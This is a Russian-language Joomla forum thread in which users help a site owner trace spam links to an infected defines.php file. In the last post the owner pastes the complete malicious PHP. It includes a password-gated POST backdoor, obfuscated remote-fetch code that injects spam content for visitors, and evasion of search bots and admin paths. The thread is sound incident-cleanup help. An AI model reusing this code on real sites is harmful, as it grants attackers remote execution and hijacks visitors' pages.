Форум русской поддержки Joomla!® CMS
09.12.2016, 00:08:05 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Проблема в head

 (Прочитано 349 раз)
0 Пользователей и 1 Гость смотрят эту тему.
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« : 16.03.2016, 11:49:31 »

У меня появилась такая вот проблема на сайте... в верхней части сайта появились какие то ссылки и у меня не получается их оттуда убрать, помогите пожалуйста ! http://www.lid.ee/galereya-rabot
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #1 : 16.03.2016, 11:54:38 »

это называется "кака на сайте"
попробуйте найти поиском по коду diving-krabi в ноте++ или блокноте, откуда лезет, если не закодировано.
вас таким образом решили заманить на дайвинг http://www.aqua-vision.net/index.html  Grin
видно модуль или шаб или расширение какое-то с вареза с такой ссылкой(-ми).
« Последнее редактирование: 16.03.2016, 11:57:53 от vipiusss » Записан
effrit
Группа развития
*****

Репутация: +732/-7
Offline Offline

Пол: Мужской
Сообщений: 6815


effrit.com


« Ответ #2 : 16.03.2016, 12:00:26 »

сайт из 3х страниц, шаб - бесплатный, галерея - тоже.
ну если шаб или галерею умудрились с варезника скачать - то сами себе буратины.
если сайтов на аккаунте несколько - то возможно что ломанули не через этот даже.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #3 : 16.03.2016, 12:05:36 »

Шаблон бесплатный качался очень давно, а щас только это появилось... модуль facebook стоит официальный, из дополнений только галерея... а где эта "кака" может быть в шаблоне?
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #4 : 16.03.2016, 12:10:29 »

галерея... а где эта "кака" может быть в шаблоне?

поиском по коду diving-krabi в ноте++ или блокноте
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #5 : 16.03.2016, 12:11:02 »

поиском по коду diving-krabi в ноте++ или блокноте
ничего не дало
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #6 : 16.03.2016, 12:12:12 »

запакуйте сайт в архив, выложите где-то, дайте ссылку в личку.
найду.
мы тут не телепаты.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #7 : 16.03.2016, 12:20:28 »

запакуйте сайт в архив, выложите где-то, дайте ссылку в личку.
найду.
мы тут не телепаты.
отправил ссылку
Записан
wishlight
Профи
********

Репутация: +200/-1
Online Online

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #8 : 16.03.2016, 12:21:10 »

Дорвей с рекламой фармы. ai-bolit скрипт найдет.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #9 : 16.03.2016, 12:34:59 »

Дорвей с рекламой фармы. ai-bolit скрипт найдет.
Вредоносные скрипты не найдены.
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #10 : 16.03.2016, 12:36:48 »

ЛС получил, скачал, скоро доберусь, немного занят.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #11 : 16.03.2016, 12:37:38 »

ЛС получил, скачал, скоро доберусь, немного занят.
я никого не тороплю =)
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #12 : 16.03.2016, 13:54:37 »

Что-то я ничего и не обнаружил в коде.
Может искал так(
Или оно не там сидит, а или в БД или вообще на соседнем сайте хоста.
Сорян.
« Последнее редактирование: 16.03.2016, 16:17:26 от vipiusss » Записан
Skaneris
Захожу иногда
**

Репутация: +5/-0
Offline Offline

Сообщений: 20


« Ответ #13 : 16.03.2016, 23:25:59 »

А дайте-ка и мне ссылочку на архив. Посмотрю что там с ним.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #14 : 16.03.2016, 23:29:20 »

Что-то я ничего и не обнаружил в коде.
Может искал так(
Или оно не там сидит, а или в БД или вообще на соседнем сайте хоста.
Сорян.
буду тогда БД шерстить, но что искать там?
Записан
Gosha5767
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Мужской
Сообщений: 417



« Ответ #15 : 16.03.2016, 23:48:02 »

Можно еще проверить в папке images
Записан
Skaneris
Захожу иногда
**

Репутация: +5/-0
Offline Offline

Сообщений: 20


« Ответ #16 : 16.03.2016, 23:50:54 »

Скачал архив.
Попробуйте обновить на сервере файл administrator/includes/defines.php
Мой антивирус обнаружил там троянскую программу и ещё какую-то блоху. Я даже не могу посмотреть что там было, т.к. антивирус его сразу удаляет.
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #17 : 16.03.2016, 23:53:39 »

Показать текстовый блок

наверное самое нижнее в коде, куки...хотя я вроде перекодировал и не вылазило у меня и я подумал админское что-то
Записан
Skaneris
Захожу иногда
**

Репутация: +5/-0
Offline Offline

Сообщений: 20


« Ответ #18 : 16.03.2016, 23:58:33 »

Во во.
Этот файл должен заканчиваться строкой:

define('JPATH_MANIFESTS',     JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #19 : 17.03.2016, 00:07:07 »

да, точно! Skaneris спасибо за помощь автору!
что-то я бегло наверно и не понял сразу!

Автор, в этом файле оставьте только это:

Показать текстовый блок
Записан
Skaneris
Захожу иногда
**

Репутация: +5/-0
Offline Offline

Сообщений: 20


« Ответ #20 : 17.03.2016, 04:19:34 »

Но не факт, что на этом все беды закончились. 
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #21 : 17.03.2016, 20:58:56 »

Скачал архив.
Попробуйте обновить на сервере файл administrator/includes/defines.php
Мой антивирус обнаружил там троянскую программу и ещё какую-то блоху. Я даже не могу посмотреть что там было, т.к. антивирус его сразу удаляет.
Заменил на оригинал, но на фронте ничего не поменялось
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #22 : 17.03.2016, 21:02:02 »

значит по поиску кода поищите участки того, что является лишним (я удалил уже архив).
возможно такое же ещё где-то сидит.
Записан
kish
Давно я тут
****

Репутация: +3/-0
Offline Offline

Пол: Мужской
Сообщений: 243


Estonian referee


« Ответ #23 : 17.03.2016, 22:07:51 »

В обоих файлах defines.php был такой код
Код:
//istart


function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function request_url_data($url) {

    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI'])? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}
error_reporting(0);
$_passssword = '68aa31e7a29e7bca10ced099b926e4cd';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');




if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6)!= '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
//    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
//        $url = base64_decode('a3d3czksLDIzOy0xNjMtMTc7LTIzOixhb2xkLDx3dnFhdm9mbWBmJXZ3blxwbHZxYGY+OjIzNDA5MTo1OjExOTc7Ow==');
    $url = decrypt_url('a3d3czksLDIzOy0xNjMtMTc7LTIzOixhb2xkLDx3dnFhdm9mbWBmJXZ3blxwbHZxYGY+OjIzNDA5MTo1OjExOTc7Ow==');
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend
убрал его и всё пропало

Всем спасибо за помощь!
« Последнее редактирование: 17.03.2016, 22:11:10 от kish » Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet